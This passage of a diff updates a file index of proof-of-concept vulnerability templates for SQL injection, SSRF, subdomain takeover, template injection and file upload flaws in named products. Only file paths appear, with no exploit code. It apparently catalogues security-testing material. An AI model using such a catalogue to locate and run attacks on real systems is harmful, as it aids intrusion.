./poc/sql_injection/74cms-sqli-2.yaml ./poc/sql_injection/74cms-sqli-2.yml ./poc/sql_injection/74cms-sqli-8.yaml ./poc/sql_injection/74cms-sqli-9.yaml +./poc/sql_injection/74cms-sqli.yaml ./poc/sql_injection/74cms-sqli.yml ./poc/sql_injection/74cms_V3-plusa-sqli.yaml ./poc/sql_injection/74cms_v4-register-sqli.yaml @@ -94566,9 +94552,10 @@ ./poc/sql_injection/chamilo-lms-sqli-1.yaml ./poc/sql_injection/chamilo-lms-sqli-2.yaml ./poc/sql_injection/chamilo-lms-sqli-891.yaml -./poc/sql_injection/chamilo-lms-sqli-892.yaml +./poc/sql_injection/chamilo-lms-sqli.yaml ./poc/sql_injection/changjet-tplus-keyinfolist-sqli.yaml ./poc/sql_injection/chanjet-CRM-sqli.yaml +./poc/sql_injection/chanjet-crm-sqli.yaml ./poc/sql_injection/chanjetcrm-sqli.yaml ./poc/sql_injection/chanjettplus-sqli.yaml ./poc/sql_injection/cmseasy-aid-sqli.yaml 
@@ -94578,10 +94565,10 @@ ./poc/sql_injection/dahua-wpms-searchjson-sqli .yaml ./poc/sql_injection/dedecms-guestbook-sqli.yaml ./poc/sql_injection/dedecms-guestbook-sqli.yml +./poc/sql_injection/dedecms-membergroup-sqli-6796.yaml ./poc/sql_injection/dedecms-membergroup-sqli-6797.yaml ./poc/sql_injection/dedecms-membergroup-sqli-6798.yaml ./poc/sql_injection/dedecms-membergroup-sqli-6799.yaml -./poc/sql_injection/dedecms-membergroup-sqli.yaml ./poc/sql_injection/dedecms-membergroup-sqli.yml ./poc/sql_injection/discuz-sqli-my.yaml ./poc/sql_injection/discuz-sqli-nds_up_ques.yaml @@ -94589,7 +94576,6 @@ ./poc/sql_injection/discuz-v72-sqli.yaml ./poc/sql_injection/discuz-v72-sqli.yml ./poc/sql_injection/dotnetcms-sqli-7089.yaml -./poc/sql_injection/dotnetcms-sqli.yaml ./poc/sql_injection/dotnetcms-sqli.yml ./poc/sql_injection/drupal-cve-2014-3704-sqli.yml ./poc/sql_injection/duomicms-sqli.yaml @@ -94606,6 +94592,7 @@ ./poc/sql_injection/ecology-oa-filedownloadforoutdoc-sqli.yaml ./poc/sql_injection/ecology-sqli2.yaml ./poc/sql_injection/ecology-syncuserinfo-sqli-7177.yaml +./poc/sql_injection/ecology-syncuserinfo-sqli.yaml ./poc/sql_injection/ecology-syncuserinfo-sqli.yml ./poc/sql_injection/ecology-v8-sqli.yaml ./poc/sql_injection/ecology-v8-sqli.yml @@ -94620,6 +94607,7 @@ ./poc/sql_injection/erensoft-sqli.yaml ./poc/sql_injection/errorbased_sqli.yaml ./poc/sql_injection/etouch-v2-sqli-7265.yaml +./poc/sql_injection/etouch-v2-sqli-7266.yaml ./poc/sql_injection/etouch-v2-sqli-7267.yaml ./poc/sql_injection/etouch-v2-sqli-7268.yaml ./poc/sql_injection/etouch-v2-sqli.yml @@ -94676,7 +94664,6 @@ ./poc/sql_injection/joomla-sqli-hdwplayer.yaml ./poc/sql_injection/joomla-sqli-vnmshop.yaml ./poc/sql_injection/joomla-sqli-weblinks_categories.yaml -./poc/sql_injection/kevinlab-bems-sqli-8457.yaml ./poc/sql_injection/kevinlab-bems-sqli-8458.yaml ./poc/sql_injection/kevinlab-bems-sqli-8459.yaml ./poc/sql_injection/kevinlab-bems-sqli-8460.yaml 
@@ -94708,12 +94695,14 @@ ./poc/sql_injection/qianxin-360-tianqing-rptsvcsyncpoint-sqli.yaml ./poc/sql_injection/qibocms-sqli.yaml ./poc/sql_injection/qibocms-sqli.yml +./poc/sql_injection/quick-cms-sqli.yaml ./poc/sql_injection/realor-appdel-sqli.yaml ./poc/sql_injection/realor-appsave-sqli-rce.yaml ./poc/sql_injection/realor_tianyi_avs_demo_sql_injection.yaml ./poc/sql_injection/seaCMS-sqli.yaml ./poc/sql_injection/seacms-dmku-sqli.yaml ./poc/sql_injection/seacms-sqli(1).yaml +./poc/sql_injection/seacms-sqli-10103.yaml ./poc/sql_injection/seacms-sqli.yml ./poc/sql_injection/seacms-v101v11-comment-api-sqli.yaml ./poc/sql_injection/seeyon-wooyun-2015-0108235-sqli.yaml @@ -94733,10 +94722,10 @@ ./poc/sql_injection/sqli-symfony.yaml ./poc/sql_injection/sqli-vuln-params-deep.yaml ./poc/sql_injection/sqli-vuln-params.yaml +./poc/sql_injection/sqli.yaml ./poc/sql_injection/sqli2.yaml ./poc/sql_injection/sqli_b_sleep.yaml ./poc/sql_injection/sqli_error.yaml -./poc/sql_injection/sqli_header-10504.yaml ./poc/sql_injection/sqli_header.yaml ./poc/sql_injection/sqliheader.yaml ./poc/sql_injection/stackposts-sqli.yaml @@ -94793,7 +94782,6 @@ ./poc/sql_injection/wordpress-woocommerce-sqli-11342.yaml ./poc/sql_injection/wordpress-woocommerce-sqli-11343.yaml ./poc/sql_injection/wordpress-woocommerce-sqli-11344.yaml -./poc/sql_injection/wordpress-woocommerce-sqli-11345.yaml ./poc/sql_injection/wordpress-woocommerce-sqli-2.yaml ./poc/sql_injection/wordpress-woocommerce-sqli.yaml ./poc/sql_injection/wp-advanced-search-sqli.yaml @@ -94805,7 +94793,6 @@ ./poc/sql_injection/wuzhicms-sqli-11659.yaml ./poc/sql_injection/wuzhicms-v410-sqli.yaml ./poc/sql_injection/wuzhicms-v410-sqli.yml -./poc/sql_injection/xdcms-sqli-11664.yaml ./poc/sql_injection/xdcms-sqli-11665.yaml ./poc/sql_injection/xdcms-sqli-11666.yaml ./poc/sql_injection/xdcms-sqli-11667.yaml 
@@ -94848,7 +94835,6 @@ ./poc/sql_injection/yungoucms-sqli.yaml ./poc/sql_injection/yungoucms-sqli.yml ./poc/sql_injection/zabbix-cve-2016-10134-sqli.yml -./poc/sql_injection/zcms-v3-sqli-11773.yaml ./poc/sql_injection/zcms-v3-sqli-11774.yaml ./poc/sql_injection/zcms-v3-sqli-11775.yaml ./poc/sql_injection/zcms-v3-sqli.yaml @@ -95064,11 +95050,12 @@ ./poc/ssrf/blind-ssrf.yaml ./poc/ssrf/blind_ssrf.yaml ./poc/ssrf/cloudflare-image-ssrf-1020.yaml +./poc/ssrf/cloudflare-image-ssrf-1021.yaml ./poc/ssrf/cloudflare-image-ssrf-1022.yaml ./poc/ssrf/cloudflare-image-ssrf-1023.yaml ./poc/ssrf/confluence-ssrf-sharelinks-1190.yaml ./poc/ssrf/confluence-ssrf-sharelinks-1191.yaml -./poc/ssrf/confluence-ssrf-sharelinks-1193.yaml +./poc/ssrf/confluence-ssrf-sharelinks-1192.yaml ./poc/ssrf/confluence-ssrf-sharelinks-1194.yaml ./poc/ssrf/custom-microsoft-ssrf-detect.yaml ./poc/ssrf/custom-weblogic-SSRF-detect.yaml @@ -95081,6 +95068,7 @@ ./poc/ssrf/gitlab-ssrf-cve-2021-22214.yml ./poc/ssrf/hasura-graphql-ssrf-7903.yaml ./poc/ssrf/hasura-graphql-ssrf-7904.yaml +./poc/ssrf/hasura-graphql-ssrf-7905.yaml ./poc/ssrf/hasura-graphql-ssrf-7906.yaml ./poc/ssrf/hasura-graphql-ssrf.yaml ./poc/ssrf/header-blind-ssrf.yaml @@ -95105,7 +95093,7 @@ ./poc/ssrf/microstrategy-ssrf-8861.yaml ./poc/ssrf/microstrategy-ssrf.yaml ./poc/ssrf/office-webapps-ssrf.yaml -./poc/ssrf/openbmcs-ssrf-9261.yaml +./poc/ssrf/openbmcs-ssrf.yaml ./poc/ssrf/openfire-cve-2019-18394-ssrf.yml ./poc/ssrf/poc-yaml-vmware-vcenter-ssrf.yaml ./poc/ssrf/request-backets-ssrf.yaml 
@@ -95138,14 +95126,13 @@ ./poc/ssrf/umbraco-base-ssrf-10882.yaml ./poc/ssrf/umbraco-base-ssrf-2.yaml ./poc/ssrf/umbraco-base-ssrf-3.yaml -./poc/ssrf/umbraco-base-ssrf.yaml ./poc/ssrf/vmware-vcenter-ssrf-11051.yaml ./poc/ssrf/vmware-vcenter-ssrf-11052.yaml ./poc/ssrf/vmware-vcenter-ssrf-11053.yaml ./poc/ssrf/vmware-vrealize-cve-2021-21975-ssrf.yml +./poc/ssrf/w3c-total-cache-ssrf-11077.yaml ./poc/ssrf/w3c-total-cache-ssrf-11078.yaml ./poc/ssrf/w3c-total-cache-ssrf-11079.yaml -./poc/ssrf/w3c-total-cache-ssrf-11080.yaml ./poc/ssrf/w3c-total-cache-ssrf-11081.yaml ./poc/ssrf/weblogic-ssrf.yaml ./poc/ssrf/weblogic-ssrf.yml @@ -95158,6 +95145,7 @@ ./poc/ssrf/wp-multiple-theme-ssrf-11510.yaml ./poc/ssrf/wp-multiple-theme-ssrf-11511.yaml ./poc/ssrf/wp-multiple-theme-ssrf-11512.yaml +./poc/ssrf/wp-multiple-theme-ssrf-11513.yaml ./poc/ssrf/wp-plugin-canto-ssrf.yaml ./poc/ssrf/wp-under-construction-ssrf.yaml ./poc/ssrf/wso2-ssrf.yaml @@ -95167,10 +95155,10 @@ ./poc/ssrf/xmlrpc-pingback-ssrf-11688.yaml ./poc/ssrf/xmlrpc-pingback-ssrf-11690.yaml ./poc/ssrf/xmlrpc-pingback-ssrf.yaml -./poc/ssrf/yongyou-ssrf-11745.yaml ./poc/ssrf/yongyou-ssrf.yaml ./poc/ssrf/zimbra-preauth-ssrf-11809.yaml ./poc/ssrf/zimbra-preauth-ssrf-11810.yaml +./poc/ssrf/zimbra-preauth-ssrf.yaml ./poc/ssrf/zzzcms-ssrf.yaml ./poc/subdomain_takeover/account-takeover-via-registration.yaml ./poc/subdomain_takeover/acquia-takeover-34.yaml 
@@ -95178,19 +95166,22 @@ ./poc/subdomain_takeover/aftership-takeover-202.yaml ./poc/subdomain_takeover/aftership-takeover-203.yaml ./poc/subdomain_takeover/aftership-takeover-204.yaml +./poc/subdomain_takeover/aftership-takeover-205.yaml ./poc/subdomain_takeover/aftership-takeover-206.yaml +./poc/subdomain_takeover/agilecrm-takeover-208.yaml ./poc/subdomain_takeover/agilecrm-takeover-209.yaml ./poc/subdomain_takeover/agilecrm-takeover-210.yaml ./poc/subdomain_takeover/agilecrm-takeover-211.yaml ./poc/subdomain_takeover/aha-takeover-213.yaml ./poc/subdomain_takeover/aha-takeover-214.yaml ./poc/subdomain_takeover/aha-takeover-215.yaml +./poc/subdomain_takeover/aha-takeover-216.yaml ./poc/subdomain_takeover/aha-takeover-217.yaml +./poc/subdomain_takeover/airee-takeover-226.yaml ./poc/subdomain_takeover/airee-takeover-227.yaml -./poc/subdomain_takeover/airee-takeover-228.yaml ./poc/subdomain_takeover/airee-takeover.yaml ./poc/subdomain_takeover/anima-takeover-317.yaml -./poc/subdomain_takeover/anima-takeover-318.yaml +./poc/subdomain_takeover/anima-takeover-319.yaml ./poc/subdomain_takeover/anima-takeover-320.yaml ./poc/subdomain_takeover/anima-takeover.yaml ./poc/subdomain_takeover/announcekit-takeover-322.yaml 
@@ -95204,25 +95195,26 @@ ./poc/subdomain_takeover/azure-takeover-detection-682.yaml ./poc/subdomain_takeover/azure-takeover-detection-683.yaml ./poc/subdomain_takeover/azure-takeover-detection.yaml -./poc/subdomain_takeover/bigcartel-takeover-727.yaml +./poc/subdomain_takeover/bigcartel-takeover-728.yaml ./poc/subdomain_takeover/bigcartel-takeover-729.yaml ./poc/subdomain_takeover/bigcartel-takeover.yaml +./poc/subdomain_takeover/bitbucket-takeover-738.yaml ./poc/subdomain_takeover/bitbucket-takeover-739.yaml -./poc/subdomain_takeover/bitbucket-takeover-740.yaml ./poc/subdomain_takeover/bitbucket-takeover-741.yaml ./poc/subdomain_takeover/bitbucket-takeover.yaml -./poc/subdomain_takeover/brightcove-takeover-785.yaml +./poc/subdomain_takeover/brightcove-takeover-783.yaml +./poc/subdomain_takeover/brightcove-takeover-784.yaml ./poc/subdomain_takeover/brightcove-takeover.yaml ./poc/subdomain_takeover/campaignmonitor-takeover.yaml +./poc/subdomain_takeover/canny-takeover-854.yaml ./poc/subdomain_takeover/canny-takeover-855.yaml ./poc/subdomain_takeover/canny-takeover-856.yaml -./poc/subdomain_takeover/canny-takeover-857.yaml ./poc/subdomain_takeover/canny-takeover.yaml ./poc/subdomain_takeover/cargo-takeover-866.yaml -./poc/subdomain_takeover/cargo-takeover-868.yaml +./poc/subdomain_takeover/cargo-takeover-867.yaml ./poc/subdomain_takeover/cargo-takeover-869.yaml ./poc/subdomain_takeover/cargo-takeover.yaml -./poc/subdomain_takeover/cargocollective-takeover-862.yaml +./poc/subdomain_takeover/cargocollective-takeover-863.yaml ./poc/subdomain_takeover/cargocollective-takeover-864.yaml ./poc/subdomain_takeover/cargocollective-takeover-865.yaml ./poc/subdomain_takeover/cargocollective-takeover.yaml 
@@ -95230,6 +95222,7 @@ ./poc/subdomain_takeover/detect-all-takeover.yaml ./poc/subdomain_takeover/detect-all-takeovers.yaml ./poc/subdomain_takeover/elasticbeanstalk-takeover.yaml +./poc/subdomain_takeover/elasticbeantalk-takeover-7188.yaml ./poc/subdomain_takeover/elasticbeantalk-takeover.yaml ./poc/subdomain_takeover/fastly-takeover-7429.yaml ./poc/subdomain_takeover/fastly-takeover.yaml 
@@ -95237,30 +95230,35 @@ ./poc/subdomain_takeover/feedpress-takeover-7456.yaml ./poc/subdomain_takeover/feedpress-takeover.yaml ./poc/subdomain_takeover/flexbe-takeover-7504.yaml +./poc/subdomain_takeover/flexbe-takeover-7505.yaml ./poc/subdomain_takeover/flexbe-takeover-7506.yaml ./poc/subdomain_takeover/flexbe-takeover.yaml +./poc/subdomain_takeover/flywheel-takeover-7525.yaml ./poc/subdomain_takeover/flywheel-takeover-7526.yaml ./poc/subdomain_takeover/flywheel-takeover.yaml ./poc/subdomain_takeover/flywheel_takeover.yaml -./poc/subdomain_takeover/freshdesk-takeover-7540.yaml +./poc/subdomain_takeover/freshdesk-takeover-7541.yaml ./poc/subdomain_takeover/freshdesk-takeover.yaml ./poc/subdomain_takeover/freshservice-takeover.yaml +./poc/subdomain_takeover/frontify-takeover-7542.yaml ./poc/subdomain_takeover/frontify-takeover-7543.yaml ./poc/subdomain_takeover/frontify-takeover-7544.yaml ./poc/subdomain_takeover/frontify-takeover.yaml ./poc/subdomain_takeover/gemfury-takeover-7576.yaml ./poc/subdomain_takeover/gemfury-takeover-7577.yaml +./poc/subdomain_takeover/gemfury-takeover-7578.yaml ./poc/subdomain_takeover/gemfury-takeover-7579.yaml ./poc/subdomain_takeover/gemfury-takeover.yaml -./poc/subdomain_takeover/getresponse-takeover-7607.yaml ./poc/subdomain_takeover/getresponse-takeover-7608.yaml +./poc/subdomain_takeover/getresponse-takeover-7609.yaml ./poc/subdomain_takeover/getresponse-takeover-7610.yaml ./poc/subdomain_takeover/getresponse-takeover.yaml +./poc/subdomain_takeover/ghost-takeover-7619.yaml ./poc/subdomain_takeover/ghost-takeover-7620.yaml -./poc/subdomain_takeover/ghost-takeover-7621.yaml ./poc/subdomain_takeover/ghost-takeover-7622.yaml ./poc/subdomain_takeover/ghost-takeover.yaml ./poc/subdomain_takeover/gitbook-takeover-7626.yaml +./poc/subdomain_takeover/gitbook-takeover-7627.yaml ./poc/subdomain_takeover/gitbook-takeover.yaml ./poc/subdomain_takeover/github-takeover-7658.yaml ./poc/subdomain_takeover/github-takeover-7659.yaml 
@@ -95269,52 +95267,52 @@ ./poc/subdomain_takeover/github-takeover-7662.yaml ./poc/subdomain_takeover/github-takeover-7663.yaml ./poc/subdomain_takeover/github-takeover.yaml +./poc/subdomain_takeover/hatenablog-takeover-7907.yaml ./poc/subdomain_takeover/hatenablog-takeover-7908.yaml ./poc/subdomain_takeover/hatenablog-takeover-7909.yaml ./poc/subdomain_takeover/hatenablog-takeover-7910.yaml ./poc/subdomain_takeover/hatenablog-takeover.yaml -./poc/subdomain_takeover/helpjuice-takeover-7925.yaml +./poc/subdomain_takeover/helpjuice-takeover-7926.yaml ./poc/subdomain_takeover/helpjuice-takeover-7927.yaml ./poc/subdomain_takeover/helpjuice-takeover-7928.yaml ./poc/subdomain_takeover/helpjuice-takeover.yaml ./poc/subdomain_takeover/helprace-takeover-7929.yaml +./poc/subdomain_takeover/helprace-takeover-7930.yaml ./poc/subdomain_takeover/helprace-takeover-7931.yaml -./poc/subdomain_takeover/helprace-takeover-7932.yaml ./poc/subdomain_takeover/helprace-takeover.yaml ./poc/subdomain_takeover/helpscout-takeover-7933.yaml ./poc/subdomain_takeover/helpscout-takeover-7934.yaml ./poc/subdomain_takeover/helpscout-takeover-7935.yaml +./poc/subdomain_takeover/helpscout-takeover-7936.yaml ./poc/subdomain_takeover/helpscout-takeover.yaml ./poc/subdomain_takeover/heroku-takeover-7941.yaml ./poc/subdomain_takeover/heroku-takeover-7942.yaml ./poc/subdomain_takeover/heroku-takeover-7943.yaml -./poc/subdomain_takeover/heroku-takeover-7944.yaml ./poc/subdomain_takeover/heroku-takeover.yaml ./poc/subdomain_takeover/hubspot-takeover-8077.yaml ./poc/subdomain_takeover/hubspot-takeover-8078.yaml ./poc/subdomain_takeover/hubspot-takeover-8079.yaml ./poc/subdomain_takeover/hubspot-takeover.yaml -./poc/subdomain_takeover/intercom-takeover-8167.yaml +./poc/subdomain_takeover/intercom-takeover-8166.yaml ./poc/subdomain_takeover/intercom-takeover-8168.yaml ./poc/subdomain_takeover/intercom-takeover-8169.yaml ./poc/subdomain_takeover/intercom-takeover.yaml 
./poc/subdomain_takeover/jazzhr-takeover-8233.yaml ./poc/subdomain_takeover/jazzhr-takeover-8234.yaml +./poc/subdomain_takeover/jazzhr-takeover-8235.yaml ./poc/subdomain_takeover/jazzhr-takeover.yaml +./poc/subdomain_takeover/jetbrains-takeover-8292.yaml ./poc/subdomain_takeover/jetbrains-takeover-8293.yaml ./poc/subdomain_takeover/jetbrains-takeover-8294.yaml ./poc/subdomain_takeover/jetbrains-takeover.yaml ./poc/subdomain_takeover/kinsta-takeover-8492.yaml ./poc/subdomain_takeover/kinsta-takeover-8493.yaml ./poc/subdomain_takeover/kinsta-takeover-8494.yaml -./poc/subdomain_takeover/kinsta-takeover-8495.yaml ./poc/subdomain_takeover/kinsta-takeover.yaml -./poc/subdomain_takeover/landingi-takeover-8567.yaml +./poc/subdomain_takeover/landingi-takeover-8566.yaml ./poc/subdomain_takeover/landingi-takeover.yaml -./poc/subdomain_takeover/launchrock-takeover-8602.yaml ./poc/subdomain_takeover/launchrock-takeover-8603.yaml ./poc/subdomain_takeover/launchrock-takeover-8604.yaml -./poc/subdomain_takeover/launchrock-takeover-8605.yaml ./poc/subdomain_takeover/launchrock-takeover.yaml ./poc/subdomain_takeover/leadpages-takeover.yaml ./poc/subdomain_takeover/locomotivetakeover.yaml 
@@ -95328,64 +95326,63 @@ ./poc/subdomain_takeover/netlify-takeover-9042.yaml ./poc/subdomain_takeover/netlify-takeover-9043.yaml ./poc/subdomain_takeover/netlify-takeover.yaml -./poc/subdomain_takeover/ngrok-takeover-9126.yaml ./poc/subdomain_takeover/ngrok-takeover-9127.yaml +./poc/subdomain_takeover/ngrok-takeover-9128.yaml ./poc/subdomain_takeover/ngrok-takeover-9129.yaml ./poc/subdomain_takeover/ngrok-takeover.yaml ./poc/subdomain_takeover/pagewiz-takeover.yaml ./poc/subdomain_takeover/pantheon-takeover-9458.yaml -./poc/subdomain_takeover/pantheon-takeover-9459.yaml ./poc/subdomain_takeover/pantheon-takeover-9460.yaml ./poc/subdomain_takeover/pantheon-takeover-9461.yaml ./poc/subdomain_takeover/pantheon-takeover.yaml -./poc/subdomain_takeover/pingdom-takeover-9584.yaml ./poc/subdomain_takeover/pingdom-takeover-9585.yaml +./poc/subdomain_takeover/pingdom-takeover-9586.yaml ./poc/subdomain_takeover/pingdom-takeover-9587.yaml ./poc/subdomain_takeover/pingdom-takeover.yaml ./poc/subdomain_takeover/proposify-takeover-9693.yaml ./poc/subdomain_takeover/proposify-takeover-9694.yaml -./poc/subdomain_takeover/proposify-takeover-9695.yaml +./poc/subdomain_takeover/proposify-takeover-9696.yaml ./poc/subdomain_takeover/proposify-takeover.yaml ./poc/subdomain_takeover/readme-takeover-9841.yaml +./poc/subdomain_takeover/readme-takeover-9842.yaml ./poc/subdomain_takeover/readme-takeover-9843.yaml ./poc/subdomain_takeover/readme-takeover.yaml -./poc/subdomain_takeover/readthedocs-takeover-9844.yaml ./poc/subdomain_takeover/readthedocs-takeover-9845.yaml +./poc/subdomain_takeover/readthedocs-takeover-9846.yaml ./poc/subdomain_takeover/readthedocs-takeover-9847.yaml ./poc/subdomain_takeover/readthedocs-takeover.yaml ./poc/subdomain_takeover/s3-subtakeover-9967.yaml -./poc/subdomain_takeover/s3-subtakeover-9968.yaml +./poc/subdomain_takeover/s3-subtakeover-9969.yaml ./poc/subdomain_takeover/s3-subtakeover.yaml -./poc/subdomain_takeover/shopify-takeover-10201.yaml 
./poc/subdomain_takeover/shopify-takeover-10202.yaml ./poc/subdomain_takeover/shopify-takeover-10203.yaml ./poc/subdomain_takeover/shopify-takeover-10204.yaml ./poc/subdomain_takeover/shopify-takeover.yaml ./poc/subdomain_takeover/short-io-takeover.yaml ./poc/subdomain_takeover/simplebooklet-takeover-10271.yaml -./poc/subdomain_takeover/simplebooklet-takeover-10272.yaml ./poc/subdomain_takeover/simplebooklet-takeover-10273.yaml +./poc/subdomain_takeover/simplebooklet-takeover-10274.yaml ./poc/subdomain_takeover/simplebooklet-takeover.yaml +./poc/subdomain_takeover/smartjob-takeover-10322.yaml ./poc/subdomain_takeover/smartjob-takeover-10323.yaml -./poc/subdomain_takeover/smartjob-takeover-10324.yaml ./poc/subdomain_takeover/smartjob-takeover-10325.yaml ./poc/subdomain_takeover/smartjob-takeover.yaml -./poc/subdomain_takeover/smartling-takeover-10326.yaml +./poc/subdomain_takeover/smartling-takeover-10327.yaml ./poc/subdomain_takeover/smartling-takeover.yaml ./poc/subdomain_takeover/smugmug-takeover-10337.yaml -./poc/subdomain_takeover/smugmug-takeover-10338.yaml +./poc/subdomain_takeover/smugmug-takeover-10339.yaml ./poc/subdomain_takeover/smugmug-takeover-10340.yaml ./poc/subdomain_takeover/smugmug-takeover.yaml ./poc/subdomain_takeover/sprintful-takeover-10495.yaml ./poc/subdomain_takeover/sprintful-takeover.yaml ./poc/subdomain_takeover/strikingly-takeover-10549.yaml ./poc/subdomain_takeover/strikingly-takeover-10550.yaml +./poc/subdomain_takeover/strikingly-takeover-10551.yaml ./poc/subdomain_takeover/strikingly-takeover.yaml ./poc/subdomain_takeover/subdomain-takeOver.yaml ./poc/subdomain_takeover/subdomain-takeover-dns-wildcards.yaml ./poc/subdomain_takeover/subdomain-takeover-dns.yaml ./poc/subdomain_takeover/subdomain-takeover.yaml -./poc/subdomain_takeover/surge-takeover-10578.yaml ./poc/subdomain_takeover/surge-takeover-10579.yaml ./poc/subdomain_takeover/surge-takeover.yaml ./poc/subdomain_takeover/surveygizmo-takeover-10581.yaml 
@@ -95395,53 +95392,53 @@ ./poc/subdomain_takeover/surveysparrow-takeover.yaml ./poc/subdomain_takeover/takeover-checker.yaml ./poc/subdomain_takeover/tave-takeover-10659.yaml +./poc/subdomain_takeover/tave-takeover-10660.yaml ./poc/subdomain_takeover/tave-takeover-10661.yaml -./poc/subdomain_takeover/tave-takeover-10662.yaml ./poc/subdomain_takeover/tave-takeover.yaml +./poc/subdomain_takeover/teamwork-takeover-10668.yaml ./poc/subdomain_takeover/teamwork-takeover-10669.yaml -./poc/subdomain_takeover/teamwork-takeover-10670.yaml ./poc/subdomain_takeover/teamwork-takeover-10671.yaml ./poc/subdomain_takeover/teamwork-takeover.yaml -./poc/subdomain_takeover/tictail-takeover-10767.yaml +./poc/subdomain_takeover/tictail-takeover-10766.yaml ./poc/subdomain_takeover/tictail-takeover-10768.yaml ./poc/subdomain_takeover/tictail-takeover.yaml -./poc/subdomain_takeover/tilda-takeover-10781.yaml ./poc/subdomain_takeover/tilda-takeover-10782.yaml +./poc/subdomain_takeover/tilda-takeover-10783.yaml ./poc/subdomain_takeover/tilda-takeover-10784.yaml ./poc/subdomain_takeover/tilda-takeover.yaml +./poc/subdomain_takeover/tumblr-takeover-10845.yaml ./poc/subdomain_takeover/tumblr-takeover-10846.yaml -./poc/subdomain_takeover/tumblr-takeover-10847.yaml ./poc/subdomain_takeover/tumblr-takeover.yaml ./poc/subdomain_takeover/uberflip-takeover-10864.yaml ./poc/subdomain_takeover/uberflip-takeover-10865.yaml ./poc/subdomain_takeover/uberflip-takeover-10866.yaml ./poc/subdomain_takeover/uberflip-takeover.yaml -./poc/subdomain_takeover/unbounce-takeover-10971.yaml +./poc/subdomain_takeover/unbounce-takeover-10970.yaml ./poc/subdomain_takeover/unbounce-takeover.yaml ./poc/subdomain_takeover/uptimerobot-takeover-10986.yaml +./poc/subdomain_takeover/uptimerobot-takeover-10987.yaml ./poc/subdomain_takeover/uptimerobot-takeover-10988.yaml -./poc/subdomain_takeover/uptimerobot-takeover-10989.yaml ./poc/subdomain_takeover/uptimerobot-takeover.yaml ./poc/subdomain_takeover/urge-takeover.yaml 
./poc/subdomain_takeover/uservoice-takeover.yaml -./poc/subdomain_takeover/vend-takeover-10996.yaml ./poc/subdomain_takeover/vend-takeover-10997.yaml +./poc/subdomain_takeover/vend-takeover-10998.yaml ./poc/subdomain_takeover/vend-takeover-10999.yaml ./poc/subdomain_takeover/vend-takeover.yaml -./poc/subdomain_takeover/vercel-takeover-11001.yaml +./poc/subdomain_takeover/vercel-takeover-11000.yaml ./poc/subdomain_takeover/vercel-takeover.yaml -./poc/subdomain_takeover/webflow-takeover-11131.yaml ./poc/subdomain_takeover/webflow-takeover-11132.yaml +./poc/subdomain_takeover/webflow-takeover-11133.yaml ./poc/subdomain_takeover/webflow-takeover-11134.yaml ./poc/subdomain_takeover/webflow-takeover.yaml ./poc/subdomain_takeover/wishpond-takeover-11215.yaml -./poc/subdomain_takeover/wishpond-takeover-11217.yaml +./poc/subdomain_takeover/wishpond-takeover-11216.yaml ./poc/subdomain_takeover/wishpond-takeover-11218.yaml ./poc/subdomain_takeover/wishpond-takeover.yaml ./poc/subdomain_takeover/wix-takeover-11219.yaml ./poc/subdomain_takeover/wordpress-takeover-11310.yaml ./poc/subdomain_takeover/wordpress-takeover-11311.yaml -./poc/subdomain_takeover/wordpress-takeover-11313.yaml +./poc/subdomain_takeover/wordpress-takeover-11312.yaml ./poc/subdomain_takeover/wordpress-takeover-11314.yaml ./poc/subdomain_takeover/wordpress-takeover.yaml ./poc/subdomain_takeover/worksite-takeover-workflow-11389.yaml 
@@ -95449,11 +95446,11 @@ ./poc/subdomain_takeover/worksites-takeover.yaml ./poc/subdomain_takeover/wpsite-background-takeover-27e55b32604a97373f48c9d933458e81.yaml ./poc/subdomain_takeover/wpsite-background-takeover.yaml -./poc/subdomain_takeover/wufoo-takeover-11649.yaml +./poc/subdomain_takeover/wufoo-takeover-11648.yaml ./poc/subdomain_takeover/wufoo-takeover-11650.yaml ./poc/subdomain_takeover/wufoo-takeover-11651.yaml ./poc/subdomain_takeover/wufoo-takeover.yaml -./poc/subdomain_takeover/zendesk-takeover-11780.yaml +./poc/subdomain_takeover/zendesk-takeover-11781.yaml ./poc/subdomain_takeover/zendesk-takeover-11782.yaml ./poc/subdomain_takeover/zendesk-takeover-11783.yaml ./poc/subdomain_takeover/zendesk-takeover.yaml @@ -95461,15 +95458,17 @@ ./poc/template_injection/hidden-ssti.yaml ./poc/template_injection/jeecg-boot-ssti.yaml ./poc/template_injection/node-nunjucks-ssti.yaml +./poc/template_injection/pdf-signer-ssti-to-rce-9470.yaml ./poc/template_injection/pdf-signer-ssti-to-rce-9471.yaml -./poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml ./poc/template_injection/pdf-signer-ssti-to-rce.yaml +./poc/template_injection/pikpikcussti.yaml ./poc/template_injection/reflection-ssti.yaml ./poc/template_injection/ssti-10528.yaml ./poc/template_injection/ssti-fuzz.yaml ./poc/template_injection/ssti-jinja2.yaml ./poc/template_injection/ssti-vuln-params.yaml ./poc/template_injection/ssti.yaml +./poc/template_injection/twig-php-ssti-10856.yaml ./poc/template_injection/twig-php-ssti-10857.yaml ./poc/template_injection/twig-php-ssti-10858.yaml ./poc/template_injection/twig-php-ssti-10859.yaml 
@@ -95613,7 +95612,6 @@ ./poc/upload/exposed-jquery-file-upload-7313.yaml ./poc/upload/exposed-jquery-file-upload-7314.yaml ./poc/upload/exposed-jquery-file-upload-7315.yaml -./poc/upload/exposed-jquery-file-upload.yaml ./poc/upload/fanruan-finereport-v9-design-save-svg-fileupload.yaml ./poc/upload/fanruan-oa-v9-designsavevg-upload-file.yaml ./poc/upload/fanwei-e-office-v10-fileupload.yaml @@ -95765,8 +95763,8 @@ ./poc/upload/nsfocus-nf-bugsInfo-fileupload.yaml ./poc/upload/oa-v9-uploads-file-9187.yaml ./poc/upload/oa-v9-uploads-file-9188.yaml -./poc/upload/oa-v9-uploads-file-9189.yaml -./poc/upload/oa-v9-uploads-file-9190.yaml +./poc/upload/oa-v9-uploads-file-9191.yaml +./poc/upload/oa-v9-uploads-file.yaml ./poc/upload/pc4uploader.yaml ./poc/upload/pigcms-manage-admin-fileupload.yaml ./poc/upload/powercreator-arbitrary-file-upload.yaml @@ -95842,6 +95840,7 @@ ./poc/upload/shiziyuCMS-ck-AnyFileUpload.yaml ./poc/upload/showdoc-file-upload-rce-10225.yaml ./poc/upload/showdoc-file-upload-rce-10226.yaml +./poc/upload/showdoc-file-upload-rce-10227.yaml ./poc/upload/showdoc-file-upload-rce-10228.yaml ./poc/upload/showdoc-file-upload-rce.yaml ./poc/upload/showdoc-uploadfile.yaml @@ -95892,8 +95891,9 @@ ./poc/upload/ueditor_1433_net-upload-catchimage.yaml ./poc/upload/unauthenticated-popup-upload-10919.yaml 